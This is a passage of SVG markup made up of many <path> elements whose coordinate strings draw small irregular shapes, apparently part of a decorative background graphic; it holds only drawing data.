d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path 